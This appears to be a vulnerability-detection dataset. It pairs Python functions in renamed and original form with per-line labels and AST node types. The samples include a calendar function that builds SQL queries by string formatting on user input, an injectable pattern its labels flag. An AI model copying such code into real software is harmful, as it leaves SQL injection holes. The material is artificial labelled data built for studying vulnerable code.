[ "def FUNC_14(self):...\n", "\"\"\"docstring\"\"\"\n", "self.check_protected_output()\n", "VAR_20 = self.dag.reason(self).missing_output.intersection(self.existing_output\n )\n", "if VAR_20:\n", "logger.warning(\n \"\"\"Warning: the following output files of rule {} were not present when the DAG was created:\n{}\"\"\"\n .format(self.rule, VAR_20))\n", "if self.dynamic_output:\n", "for VAR_28, _ in chain(*map(partial(self.expand_dynamic, VAR_13=self.\n", "for VAR_28, VAR_27 in zip(self.output, self.rule.output):\n", "os.remove(VAR_28)\n", "VAR_28.prepare()\n", "for VAR_28 in self.log:\n", "VAR_28.prepare()\n", "if self.benchmark:\n", "self.benchmark.prepare()\n" ]
[ "def prepare(self):...\n", "\"\"\"docstring\"\"\"\n", "self.check_protected_output()\n", "unexpected_output = self.dag.reason(self).missing_output.intersection(self.\n existing_output)\n", "if unexpected_output:\n", "logger.warning(\n \"\"\"Warning: the following output files of rule {} were not present when the DAG was created:\n{}\"\"\"\n .format(self.rule, unexpected_output))\n", "if self.dynamic_output:\n", "for f, _ in chain(*map(partial(self.expand_dynamic, restriction=self.\n", "for f, f_ in zip(self.output, self.rule.output):\n", "os.remove(f)\n", "f.prepare()\n", "for f in self.log:\n", "f.prepare()\n", "if self.benchmark:\n", "self.benchmark.prepare()\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Docstring", "Expr'", "Assign'", "Condition", "Expr'", "Condition", "For", "For", "Expr'", "Expr'", "For", "Expr'", "Condition", "Expr'" ]
[ "@classmethod...\n", "super(CLASS_4, VAR_0).setUpTestData()\n", "VAR_0.permission = 'testruns.change_testcaserun'\n", "VAR_0.update_url = reverse('ajax-update_case_run_status')\n" ]
[ "@classmethod...\n", "super(TestUpdateCaseRunStatus, cls).setUpTestData()\n", "cls.permission = 'testruns.change_testcaserun'\n", "cls.update_url = reverse('ajax-update_case_run_status')\n" ]
[ 0, 0, 0, 0 ]
[ "Condition", "Expr'", "Assign'", "Assign'" ]
[ "def FUNC_9(self):...\n", "FUNC_1('MISC FILE CHECKS')\n", "VAR_22 = ('manifest.json', 'LICENSE', 'README.md', 'scripts/install',\n 'scripts/remove', 'scripts/upgrade', 'scripts/backup', 'scripts/restore')\n", "VAR_23 = 'script/backup', 'script/restore'\n", "for filename in VAR_22:\n", "if FUNC_6(self.path + '/' + filename):\n", "if FUNC_6(self.path + '/conf/php-fpm.ini'):\n", "if filename in VAR_23:\n", "FUNC_3('string')\n", "for filename in os.listdir(self.path + '/conf'):\n", "FUNC_3('Consider adding a file %s' % filename)\n", "FUNC_4('File %s is mandatory' % filename)\n", "if not os.path.isfile(self.path + '/conf/' + filename):\n", "VAR_32 = open(self.path + '/conf/' + filename).read()\n", "if 'location' in VAR_32 and 'add_header' in VAR_32:\n", "FUNC_3('string')\n" ]
[ "def misc_file_checks(self):...\n", "print_header('MISC FILE CHECKS')\n", "filenames = ('manifest.json', 'LICENSE', 'README.md', 'scripts/install',\n 'scripts/remove', 'scripts/upgrade', 'scripts/backup', 'scripts/restore')\n", "non_mandatory = 'script/backup', 'script/restore'\n", "for filename in filenames:\n", "if file_exists(self.path + '/' + filename):\n", "if file_exists(self.path + '/conf/php-fpm.ini'):\n", "if filename in non_mandatory:\n", "print_warning(\n 'Using a separate php-fpm.ini file is deprecated. Please merge your php-fpm directives directly in the pool file. (c.f. https://github.com/YunoHost-Apps/nextcloud_ynh/issues/138 )'\n )\n", "for filename in os.listdir(self.path + '/conf'):\n", "print_warning('Consider adding a file %s' % filename)\n", "print_error('File %s is mandatory' % filename)\n", "if not os.path.isfile(self.path + '/conf/' + filename):\n", "content = open(self.path + '/conf/' + filename).read()\n", "if 'location' in content and 'add_header' in content:\n", "print_warning(\n \"Do not use 'add_header' in the nginx conf. Use 'more_set_headers' instead. (See https://www.peterbe.com/plog/be-very-careful-with-your-add_header-in-nginx and https://github.com/openresty/headers-more-nginx-module#more_set_headers )\"\n )\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0 ]
[ "FunctionDef'", "Expr'", "Assign'", "Assign'", "For", "Condition", "Condition", "Condition", "Expr'", "For", "Expr'", "Expr'", "Condition", "Assign'", "Condition", "Expr'" ]
[ "def FUNC_3(self):...\n", "VAR_1 = self.client.get(f'/qa/extractionscript/')\n", "self.assertIn(f\"/qa/extractionscript/15/'> Begin QA\".encode(), VAR_1.content)\n", "VAR_2 = 9\n", "VAR_1 = self.client.get(f'/qa/extractionscript/{VAR_2}/', follow=True)\n", "self.assertEqual(VAR_1.status_code, 200)\n" ]
[ "def test_qa_script_without_ext_text(self):...\n", "response = self.client.get(f'/qa/extractionscript/')\n", "self.assertIn(f\"/qa/extractionscript/15/'> Begin QA\".encode(), response.content\n )\n", "pk = 9\n", "response = self.client.get(f'/qa/extractionscript/{pk}/', follow=True)\n", "self.assertEqual(response.status_code, 200)\n" ]
[ 0, 0, 0, 0, 0, 6 ]
[ "FunctionDef'", "Assign'", "Expr'", "Assign'", "Assign'", "Expr'" ]
[ "def FUNC_1(self):...\n", "self.render('signin.html', VAR_6='')\n" ]
[ "def get(self):...\n", "self.render('signin.html', error='')\n" ]
[ 0, 0 ]
[ "FunctionDef'", "Expr'" ]
[ "def FUNC_6(self):...\n", "if not VAR_101.user_is_admin:\n", "abort(404, 'page not found')\n" ]
[ "def run(self):...\n", "if not c.user_is_admin:\n", "abort(404, 'page not found')\n" ]
[ 0, 0, 0 ]
[ "FunctionDef'", "Condition", "Expr'" ]
[ "def FUNC_8(self):...\n", "url_helper.urllib2.urlopen(mox.IgnoreArg(), mox.IgnoreArg(), timeout=mox.\n IgnoreArg()).AndRaise(urllib2.URLError('url'))\n", "self._mox.ReplayAll()\n", "self.assertIsNone(url_helper.UrlOpen('url', max_tries=1))\n", "self._mox.VerifyAll()\n" ]
[ "def testUrlOpenFailure(self):...\n", "url_helper.urllib2.urlopen(mox.IgnoreArg(), mox.IgnoreArg(), timeout=mox.\n IgnoreArg()).AndRaise(urllib2.URLError('url'))\n", "self._mox.ReplayAll()\n", "self.assertIsNone(url_helper.UrlOpen('url', max_tries=1))\n", "self._mox.VerifyAll()\n" ]
[ 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Expr'", "Expr'", "Expr'", "Expr'" ]
[ "def FUNC_0(VAR_0):...\n", "return ''.join([(text.zfill(5) if text.isdigit() else text.lower()) for\n text in split('([0-9]+)', str(VAR_0))])\n" ]
[ "def fix_sort(string):...\n", "return ''.join([(text.zfill(5) if text.isdigit() else text.lower()) for\n text in split('([0-9]+)', str(string))])\n" ]
[ 0, 0 ]
[ "FunctionDef'", "Return'" ]
[ "def FUNC_1():...\n", "VAR_1 = [{'fieldname': 'territory', 'fieldtype': 'Link', 'label': _(\n 'Territory'), 'options': 'Territory', 'width': 100}, {'fieldname':\n 'item_group', 'fieldtype': 'Link', 'label': _('Item Group'), 'options':\n 'Item Group', 'width': 150}, {'fieldname': 'item_name', 'fieldtype':\n 'Link', 'options': 'Item', 'label': 'Item', 'width': 150}, {'fieldname':\n 'item_name', 'fieldtype': 'Data', 'label': _('Item Name'), 'width': 150\n }, {'fieldname': 'customer', 'fieldtype': 'Link', 'label': _('Customer'\n ), 'options': 'Customer', 'width': 100}, {'fieldname':\n 'last_order_date', 'fieldtype': 'Date', 'label': _('Last Order Date'),\n 'width': 100}, {'fieldname': 'qty', 'fieldtype': 'Float', 'label': _(\n 'Quantity'), 'width': 100}, {'fieldname': 'days_since_last_order',\n 'fieldtype': 'Int', 'label': _('Days Since Last Order'), 'width': 100}]\n", "return VAR_1\n" ]
[ "def get_columns():...\n", "columns = [{'fieldname': 'territory', 'fieldtype': 'Link', 'label': _(\n 'Territory'), 'options': 'Territory', 'width': 100}, {'fieldname':\n 'item_group', 'fieldtype': 'Link', 'label': _('Item Group'), 'options':\n 'Item Group', 'width': 150}, {'fieldname': 'item_name', 'fieldtype':\n 'Link', 'options': 'Item', 'label': 'Item', 'width': 150}, {'fieldname':\n 'item_name', 'fieldtype': 'Data', 'label': _('Item Name'), 'width': 150\n }, {'fieldname': 'customer', 'fieldtype': 'Link', 'label': _('Customer'\n ), 'options': 'Customer', 'width': 100}, {'fieldname':\n 'last_order_date', 'fieldtype': 'Date', 'label': _('Last Order Date'),\n 'width': 100}, {'fieldname': 'qty', 'fieldtype': 'Float', 'label': _(\n 'Quantity'), 'width': 100}, {'fieldname': 'days_since_last_order',\n 'fieldtype': 'Int', 'label': _('Days Since Last Order'), 'width': 100}]\n", "return columns\n" ]
[ 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Return'" ]
[ "def FUNC_1(self):...\n", "VAR_2 = DummyRequest([''])\n", "VAR_3 = self.web.get(VAR_2)\n", "def FUNC_2(VAR_4):...\n", "VAR_5 = '<title>{0}</title>'.format(self.MAIL_ADDRESS)\n", "VAR_6 = re.findall(VAR_5, VAR_2.written[0])\n", "self.assertEquals(len(VAR_6), 1)\n", "VAR_3.addCallback(FUNC_2)\n", "return VAR_3\n" ]
[ "def test_render_GET_should_template_account_email(self):...\n", "request = DummyRequest([''])\n", "d = self.web.get(request)\n", "def assert_response(_):...\n", "expected = '<title>{0}</title>'.format(self.MAIL_ADDRESS)\n", "matches = re.findall(expected, request.written[0])\n", "self.assertEquals(len(matches), 1)\n", "d.addCallback(assert_response)\n", "return d\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Assign'", "FunctionDef'", "Assign'", "Assign'", "Expr'", "Expr'", "Return'" ]
[ "\"\"\"string\"\"\"\n", "import cgi\n", "import json\n", "import src.models.mysql as mysql\n", "def FUNC_0(VAR_0):...\n", "\"\"\"docstring\"\"\"\n", "VAR_2 = VAR_0.copy()\n", "VAR_2['QUERY_STRING'] = ''\n", "VAR_3 = cgi.FieldStorage(fp=environ['wsgi.input'], VAR_0=data_env,\n keep_blank_values=True)\n", "return VAR_3\n" ]
[ "\"\"\" Api Controller\n\n Arquivo onde se encontra toda a lógica que rodará na rota '/api'\n\nTodo:\n\n None\n\n\"\"\"\n", "import cgi\n", "import json\n", "import src.models.mysql as mysql\n", "def getFields(environ):...\n", "\"\"\"docstring\"\"\"\n", "data_env = environ.copy()\n", "data_env['QUERY_STRING'] = ''\n", "data = cgi.FieldStorage(fp=environ['wsgi.input'], environ=data_env,\n keep_blank_values=True)\n", "return data\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "Expr'", "Import'", "Import'", "Import'", "FunctionDef'", "Docstring", "Assign'", "Assign'", "Assign'", "Return'" ]
[ "def FUNC_0(VAR_0, VAR_1, VAR_2, VAR_3):...\n", "VAR_8 = VAR_3.connect()\n", "VAR_9 = VAR_8.cursor()\n", "VAR_10 = \"SELECT userId FROM Users WHERE userEmail = '{0}'\".format(VAR_2)\n", "VAR_9.execute(VAR_10)\n", "VAR_11 = VAR_9.fetchone()\n", "if VAR_11 is None:\n", "return False, None\n", "VAR_5 = str(uuid.uuid4())\n", "if VAR_1 == '':\n", "VAR_1 = '2000-01-01'\n", "VAR_14 = (\n \"INSERT INTO Calendars (calendarId, name, day, userId) VALUES('{0}','{1}', '{2}', {3})\"\n .format(VAR_5, VAR_0, VAR_1, VAR_11[0]))\n", "VAR_9.execute(VAR_14)\n", "VAR_8.commit()\n", "VAR_14 = 'string'.format(VAR_11[0], VAR_5)\n", "VAR_9.execute(VAR_14)\n", "VAR_8.commit()\n", "return True, VAR_5\n" ]
[ "def createCalendar(calendarName, day, username, sqlHandle):...\n", "conn = sqlHandle.connect()\n", "cursor = conn.cursor()\n", "userCheckQuery = \"SELECT userId FROM Users WHERE userEmail = '{0}'\".format(\n username)\n", "cursor.execute(userCheckQuery)\n", "userResult = cursor.fetchone()\n", "if userResult is None:\n", "return False, None\n", "calendarId = str(uuid.uuid4())\n", "if day == '':\n", "day = '2000-01-01'\n", "queryString = (\n \"INSERT INTO Calendars (calendarId, name, day, userId) VALUES('{0}','{1}', '{2}', {3})\"\n .format(calendarId, calendarName, day, userResult[0]))\n", "cursor.execute(queryString)\n", "conn.commit()\n", "queryString = (\n \"\"\"INSERT INTO TimeSlots (userId, calendarId, zero, one, two, three, four, five, six, seven, eight, nine,\n ten, eleven, twelve, thirteen, fourteen, fifteen, sixteen, seventeen, eighteen, nineteen, twenty, twentyone,\n twentytwo, twentythree) VALUES({0},'{1}','','','','','','','','','','','','','','','','','','','','','','',\n '','')\"\"\"\n .format(userResult[0], calendarId))\n", "cursor.execute(queryString)\n", "conn.commit()\n", "return True, calendarId\n" ]
[ 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 4, 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Assign'", "Assign'", "Expr'", "Assign'", "Condition", "Return'", "Assign'", "Condition", "Assign'", "Assign'", "Expr'", "Expr'", "Assign'", "Expr'", "Expr'", "Return'" ]
[ "\"\"\"\nNotifier.\n\nAuthor(s): Jelle Roozenburg\n\"\"\"\n", "import logging\n", "import threading\n", "from Tribler.Core.simpledefs import NTFY_TORRENTS, NTFY_PLAYLISTS, NTFY_COMMENTS, NTFY_MODIFICATIONS, NTFY_MODERATIONS, NTFY_MARKINGS, NTFY_MYPREFERENCES, NTFY_ACTIVITIES, NTFY_REACHABLE, NTFY_CHANNELCAST, NTFY_VOTECAST, NTFY_DISPERSY, NTFY_TRACKERINFO, NTFY_UPDATE, NTFY_INSERT, NTFY_DELETE, NTFY_TUNNEL, NTFY_STARTUP_TICK, NTFY_CLOSE_TICK, NTFY_UPGRADER, SIGNAL_ALLCHANNEL_COMMUNITY, SIGNAL_SEARCH_COMMUNITY, SIGNAL_TORRENT, SIGNAL_CHANNEL, SIGNAL_CHANNEL_COMMUNITY, SIGNAL_RSS_FEED, NTFY_WATCH_FOLDER_CORRUPT_TORRENT, NTFY_NEW_VERSION, NTFY_TRIBLER, NTFY_UPGRADER_TICK, NTFY_TORRENT, NTFY_CHANNEL, NTFY_MARKET_ON_ASK, NTFY_MARKET_ON_BID, NTFY_MARKET_ON_TRANSACTION_COMPLETE, NTFY_MARKET_ON_ASK_TIMEOUT, NTFY_MARKET_ON_BID_TIMEOUT, NTFY_MARKET_IOM_INPUT_REQUIRED, NTFY_MARKET_ON_PAYMENT_RECEIVED, NTFY_MARKET_ON_PAYMENT_SENT, SIGNAL_RESOURCE_CHECK, NTFY_CREDIT_MINING, STATE_SHUTDOWN\n", "VAR_0 = [NTFY_TORRENTS, NTFY_PLAYLISTS, NTFY_COMMENTS, NTFY_MODIFICATIONS,\n NTFY_MODERATIONS, NTFY_MARKINGS, NTFY_MYPREFERENCES, NTFY_ACTIVITIES,\n NTFY_REACHABLE, NTFY_CHANNELCAST, NTFY_CLOSE_TICK, NTFY_DISPERSY,\n NTFY_STARTUP_TICK, NTFY_TRACKERINFO, NTFY_TUNNEL, NTFY_UPGRADER,\n NTFY_VOTECAST, SIGNAL_ALLCHANNEL_COMMUNITY, SIGNAL_CHANNEL,\n SIGNAL_CHANNEL_COMMUNITY, SIGNAL_RSS_FEED, SIGNAL_SEARCH_COMMUNITY,\n SIGNAL_TORRENT, NTFY_WATCH_FOLDER_CORRUPT_TORRENT, NTFY_NEW_VERSION,\n NTFY_TRIBLER, NTFY_UPGRADER_TICK, NTFY_TORRENT, NTFY_CHANNEL,\n NTFY_MARKET_ON_ASK, NTFY_MARKET_ON_BID, NTFY_MARKET_ON_ASK_TIMEOUT,\n NTFY_MARKET_ON_BID_TIMEOUT, NTFY_MARKET_ON_TRANSACTION_COMPLETE,\n NTFY_MARKET_ON_PAYMENT_RECEIVED, NTFY_MARKET_ON_PAYMENT_SENT,\n NTFY_MARKET_IOM_INPUT_REQUIRED, SIGNAL_RESOURCE_CHECK,\n NTFY_CREDIT_MINING, STATE_SHUTDOWN]\n", "def __init__(self):...\n", "self._logger = logging.getLogger(self.__class__.__name__)\n", "self.observers = []\n", "self.observerscache = {}\n", "self.observertimers = {}\n", "self.observerLock = threading.Lock()\n", "def FUNC_0(self, VAR_1, VAR_2, VAR_3=None, VAR_4=None, VAR_5=0):...\n", "VAR_3 = VAR_3 or [NTFY_UPDATE, NTFY_INSERT, NTFY_DELETE]\n", "\"\"\"string\"\"\"\n", "assert isinstance(VAR_3, list)\n", "assert VAR_2 in self.SUBJECTS, 'Subject %s not in SUBJECTS' % VAR_2\n", "VAR_9 = VAR_1, VAR_2, VAR_3, VAR_4, VAR_5\n", "self.observerLock.acquire()\n", "self.observers.append(VAR_9)\n", "self.observerLock.release()\n", "def FUNC_1(self, VAR_1):...\n", "\"\"\"docstring\"\"\"\n", "VAR_11 = 0\n", "while VAR_11 < len(self.observers):\n", "VAR_12 = self.observers[VAR_11][0]\n", "def FUNC_2(self):...\n", "if VAR_12 == VAR_1:\n", "for timer in self.observertimers.values():\n", "VAR_11 += 1\n", "timer.cancel()\n", "self.observerscache = {}\n", "self.observertimers = {}\n", "self.observers = []\n", "def FUNC_3(self, VAR_2, VAR_6, VAR_7, *VAR_8):...\n", "\"\"\"docstring\"\"\"\n", "VAR_10 = []\n", "assert VAR_2 in self.SUBJECTS, 'Subject %s not in SUBJECTS' % VAR_2\n", "VAR_8 = [VAR_2, VAR_6, VAR_7] + list(VAR_8)\n", "self.observerLock.acquire()\n", "for VAR_12, osubject, ochangeTypes, oid, VAR_5 in self.observers:\n", "self.observerLock.release()\n", "if VAR_2 == osubject and VAR_6 in ochangeTypes and (oid is None or oid == VAR_7\n", "self._logger.exception('OIDs were %s %s', repr(oid), repr(VAR_7))\n", "for task in VAR_10:\n", "if not VAR_5:\n", "task(*VAR_8)\n", "VAR_10.append(VAR_12)\n", "if VAR_12 not in self.observerscache:\n", "def FUNC_4(VAR_12):...\n", 
"self.observerscache[VAR_12].append(VAR_8)\n", "self.observerLock.acquire()\n", "if VAR_12 in self.observerscache:\n", "VAR_14 = self.observerscache[VAR_12]\n", "VAR_14 = []\n", "self.observerLock.release()\n", "if VAR_14:\n", "VAR_12(VAR_14)\n", "VAR_13 = threading.Timer(VAR_5, FUNC_4, (VAR_12,))\n", "VAR_13.setName('Notifier-timer-%s' % VAR_2)\n", "VAR_13.start()\n", "self.observerscache[VAR_12] = []\n", "self.observertimers[VAR_12] = VAR_13\n" ]
[ "\"\"\"\nNotifier.\n\nAuthor(s): Jelle Roozenburg\n\"\"\"\n", "import logging\n", "import threading\n", "from Tribler.Core.simpledefs import NTFY_TORRENTS, NTFY_PLAYLISTS, NTFY_COMMENTS, NTFY_MODIFICATIONS, NTFY_MODERATIONS, NTFY_MARKINGS, NTFY_MYPREFERENCES, NTFY_ACTIVITIES, NTFY_REACHABLE, NTFY_CHANNELCAST, NTFY_VOTECAST, NTFY_DISPERSY, NTFY_TRACKERINFO, NTFY_UPDATE, NTFY_INSERT, NTFY_DELETE, NTFY_TUNNEL, NTFY_STARTUP_TICK, NTFY_CLOSE_TICK, NTFY_UPGRADER, SIGNAL_ALLCHANNEL_COMMUNITY, SIGNAL_SEARCH_COMMUNITY, SIGNAL_TORRENT, SIGNAL_CHANNEL, SIGNAL_CHANNEL_COMMUNITY, SIGNAL_RSS_FEED, NTFY_WATCH_FOLDER_CORRUPT_TORRENT, NTFY_NEW_VERSION, NTFY_TRIBLER, NTFY_UPGRADER_TICK, NTFY_TORRENT, NTFY_CHANNEL, NTFY_MARKET_ON_ASK, NTFY_MARKET_ON_BID, NTFY_MARKET_ON_TRANSACTION_COMPLETE, NTFY_MARKET_ON_ASK_TIMEOUT, NTFY_MARKET_ON_BID_TIMEOUT, NTFY_MARKET_IOM_INPUT_REQUIRED, NTFY_MARKET_ON_PAYMENT_RECEIVED, NTFY_MARKET_ON_PAYMENT_SENT, SIGNAL_RESOURCE_CHECK, NTFY_CREDIT_MINING, STATE_SHUTDOWN\n", "SUBJECTS = [NTFY_TORRENTS, NTFY_PLAYLISTS, NTFY_COMMENTS,\n NTFY_MODIFICATIONS, NTFY_MODERATIONS, NTFY_MARKINGS, NTFY_MYPREFERENCES,\n NTFY_ACTIVITIES, NTFY_REACHABLE, NTFY_CHANNELCAST, NTFY_CLOSE_TICK,\n NTFY_DISPERSY, NTFY_STARTUP_TICK, NTFY_TRACKERINFO, NTFY_TUNNEL,\n NTFY_UPGRADER, NTFY_VOTECAST, SIGNAL_ALLCHANNEL_COMMUNITY,\n SIGNAL_CHANNEL, SIGNAL_CHANNEL_COMMUNITY, SIGNAL_RSS_FEED,\n SIGNAL_SEARCH_COMMUNITY, SIGNAL_TORRENT,\n NTFY_WATCH_FOLDER_CORRUPT_TORRENT, NTFY_NEW_VERSION, NTFY_TRIBLER,\n NTFY_UPGRADER_TICK, NTFY_TORRENT, NTFY_CHANNEL, NTFY_MARKET_ON_ASK,\n NTFY_MARKET_ON_BID, NTFY_MARKET_ON_ASK_TIMEOUT,\n NTFY_MARKET_ON_BID_TIMEOUT, NTFY_MARKET_ON_TRANSACTION_COMPLETE,\n NTFY_MARKET_ON_PAYMENT_RECEIVED, NTFY_MARKET_ON_PAYMENT_SENT,\n NTFY_MARKET_IOM_INPUT_REQUIRED, SIGNAL_RESOURCE_CHECK,\n NTFY_CREDIT_MINING, STATE_SHUTDOWN]\n", "def __init__(self):...\n", "self._logger = logging.getLogger(self.__class__.__name__)\n", "self.observers = []\n", "self.observerscache = {}\n", "self.observertimers = {}\n", "self.observerLock = threading.Lock()\n", "def add_observer(self, func, subject, changeTypes=None, id=None, cache=0):...\n", "changeTypes = changeTypes or [NTFY_UPDATE, NTFY_INSERT, NTFY_DELETE]\n", "\"\"\"\n Add observer function which will be called upon certain event\n Example:\n addObserver(NTFY_TORRENTS, [NTFY_INSERT,NTFY_DELETE]) -> get callbacks\n when peers are added or deleted\n addObserver(NTFY_TORRENTS, [NTFY_SEARCH_RESULT], 'a_search_id') -> get\n callbacks when peer-searchresults of of search\n with id=='a_search_id' come in\n \"\"\"\n", "assert isinstance(changeTypes, list)\n", "assert subject in self.SUBJECTS, 'Subject %s not in SUBJECTS' % subject\n", "obs = func, subject, changeTypes, id, cache\n", "self.observerLock.acquire()\n", "self.observers.append(obs)\n", "self.observerLock.release()\n", "def remove_observer(self, func):...\n", "\"\"\"docstring\"\"\"\n", "i = 0\n", "while i < len(self.observers):\n", "ofunc = self.observers[i][0]\n", "def remove_observers(self):...\n", "if ofunc == func:\n", "for timer in self.observertimers.values():\n", "i += 1\n", "timer.cancel()\n", "self.observerscache = {}\n", "self.observertimers = {}\n", "self.observers = []\n", "def notify(self, subject, changeType, obj_id, *args):...\n", "\"\"\"docstring\"\"\"\n", "tasks = []\n", "assert subject in self.SUBJECTS, 'Subject %s not in SUBJECTS' % subject\n", "args = [subject, changeType, obj_id] + list(args)\n", "self.observerLock.acquire()\n", "for ofunc, osubject, ochangeTypes, oid, cache in 
self.observers:\n", "self.observerLock.release()\n", "if subject == osubject and changeType in ochangeTypes and (oid is None or \n", "self._logger.exception('OIDs were %s %s', repr(oid), repr(obj_id))\n", "for task in tasks:\n", "if not cache:\n", "task(*args)\n", "tasks.append(ofunc)\n", "if ofunc not in self.observerscache:\n", "def doQueue(ofunc):...\n", "self.observerscache[ofunc].append(args)\n", "self.observerLock.acquire()\n", "if ofunc in self.observerscache:\n", "events = self.observerscache[ofunc]\n", "events = []\n", "self.observerLock.release()\n", "if events:\n", "ofunc(events)\n", "t = threading.Timer(cache, doQueue, (ofunc,))\n", "t.setName('Notifier-timer-%s' % subject)\n", "t.start()\n", "self.observerscache[ofunc] = []\n", "self.observertimers[ofunc] = t\n" ]
[ 0, 0, 0, 4, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "Expr'", "Import'", "Import'", "ImportFrom'", "Assign'", "FunctionDef'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "FunctionDef'", "Assign'", "Expr'", "Assert'", "Assert'", "Assign'", "Expr'", "Expr'", "Expr'", "FunctionDef'", "Docstring", "Assign'", "Condition", "Assign'", "FunctionDef'", "Condition", "For", "AugAssign'", "Expr'", "Assign'", "Assign'", "Assign'", "FunctionDef'", "Docstring", "Assign'", "Assert'", "Assign'", "Expr'", "For", "Expr'", "Condition", "Expr'", "For", "Condition", "Expr'", "Expr'", "Condition", "FunctionDef'", "Expr'", "Expr'", "Condition", "Assign'", "Assign'", "Expr'", "Condition", "Expr'", "Assign'", "Expr'", "Expr'", "Assign'", "Assign'" ]
[ "@property...\n", "return self._attributes['state']\n" ]
[ "@property...\n", "return self._attributes['state']\n" ]
[ 0, 0 ]
[ "Condition", "Return'" ]
[ "def FUNC_6(self, VAR_3):...\n", "return VAR_3\n" ]
[ "def run(self, x):...\n", "return x\n" ]
[ 0, 0 ]
[ "FunctionDef'", "Return'" ]
[ "def __init__(self, VAR_0, VAR_1=None):...\n", "self.exercise = VAR_0\n", "self.max_points = getattr(VAR_0, 'max_points', 0)\n", "self.difficulty = getattr(VAR_0, 'difficulty', '')\n", "self.points_to_pass = getattr(VAR_0, 'points_to_pass', 0)\n", "self.user = VAR_1\n", "self.submissions = []\n", "self.submission_count = 0\n", "self.best_submission = None\n", "self.graded = False\n", "self.unofficial = False\n", "if self.user and self.user.is_authenticated():\n", "self.submissions = list(VAR_0.get_submissions_for_student(VAR_1.userprofile))\n", "for VAR_10 in self.submissions:\n", "if not VAR_10.status in (Submission.STATUS.ERROR, Submission.STATUS.REJECTED):\n", "self.submission_count += 1\n", "if VAR_10.status == Submission.STATUS.READY and (self.best_submission is\n", "self.best_submission = VAR_10\n", "if VAR_10.status == Submission.STATUS.UNOFFICIAL and (not self.graded or \n", "self.unofficial = False\n", "self.best_submission = VAR_10\n", "self.graded = True\n", "self.unofficial = True\n" ]
[ "def __init__(self, exercise, user=None):...\n", "self.exercise = exercise\n", "self.max_points = getattr(exercise, 'max_points', 0)\n", "self.difficulty = getattr(exercise, 'difficulty', '')\n", "self.points_to_pass = getattr(exercise, 'points_to_pass', 0)\n", "self.user = user\n", "self.submissions = []\n", "self.submission_count = 0\n", "self.best_submission = None\n", "self.graded = False\n", "self.unofficial = False\n", "if self.user and self.user.is_authenticated():\n", "self.submissions = list(exercise.get_submissions_for_student(user.userprofile))\n", "for s in self.submissions:\n", "if not s.status in (Submission.STATUS.ERROR, Submission.STATUS.REJECTED):\n", "self.submission_count += 1\n", "if s.status == Submission.STATUS.READY and (self.best_submission is None or\n", "self.best_submission = s\n", "if s.status == Submission.STATUS.UNOFFICIAL and (not self.graded or self.\n", "self.unofficial = False\n", "self.best_submission = s\n", "self.graded = True\n", "self.unofficial = True\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Condition", "Assign'", "For", "Condition", "AugAssign'", "Condition", "Assign'", "Condition", "Assign'", "Assign'", "Assign'", "Assign'" ]
[ "def FUNC_13(self):...\n", "VAR_7.environ['SWARMING_LOAD_TEST'] = '1'\n", "VAR_18 = threading.Event()\n", "self.mock(VAR_18, 'wait', self.fail)\n", "self.mock(bot_main, 'run_manifest', self.fail)\n", "self.mock(bot_main, 'update_bot', self.fail)\n", "self.mock(self.bot, 'restart', self.fail)\n", "self.expected_requests([(\n 'https://localhost:1/auth/api/v1/accounts/self/xsrf_token', {'data': {},\n 'headers': {'X-XSRF-Token-Request': '1'}}, {'xsrf_token': 'token'}), (\n 'https://localhost:1/swarming/api/v1/bot/poll', {'data': self.\n attributes, 'headers': {'X-XSRF-Token': 'token'}}, {'cmd': 'restart',\n 'message': 'Please die now'})])\n", "self.assertTrue(bot_main.poll_server(self.bot, VAR_18))\n" ]
[ "def test_poll_server_restart_load_test(self):...\n", "os.environ['SWARMING_LOAD_TEST'] = '1'\n", "bit = threading.Event()\n", "self.mock(bit, 'wait', self.fail)\n", "self.mock(bot_main, 'run_manifest', self.fail)\n", "self.mock(bot_main, 'update_bot', self.fail)\n", "self.mock(self.bot, 'restart', self.fail)\n", "self.expected_requests([(\n 'https://localhost:1/auth/api/v1/accounts/self/xsrf_token', {'data': {},\n 'headers': {'X-XSRF-Token-Request': '1'}}, {'xsrf_token': 'token'}), (\n 'https://localhost:1/swarming/api/v1/bot/poll', {'data': self.\n attributes, 'headers': {'X-XSRF-Token': 'token'}}, {'cmd': 'restart',\n 'message': 'Please die now'})])\n", "self.assertTrue(bot_main.poll_server(self.bot, bit))\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Assign'", "Expr'", "Expr'", "Expr'", "Expr'", "Expr'", "Expr'" ]
[ "def FUNC_2(self):...\n", "super(CLASS_1, self).setUp()\n", "api.reset_local_state()\n", "self.logged_errors = []\n", "self.mock(handler.logging, 'error', lambda *args, **kwargs: self.\n logged_errors.append((args, kwargs)))\n", "self.logged_warnings = []\n", "self.mock(handler.logging, 'warning', lambda *args, **kwargs: self.\n logged_warnings.append((args, kwargs)))\n" ]
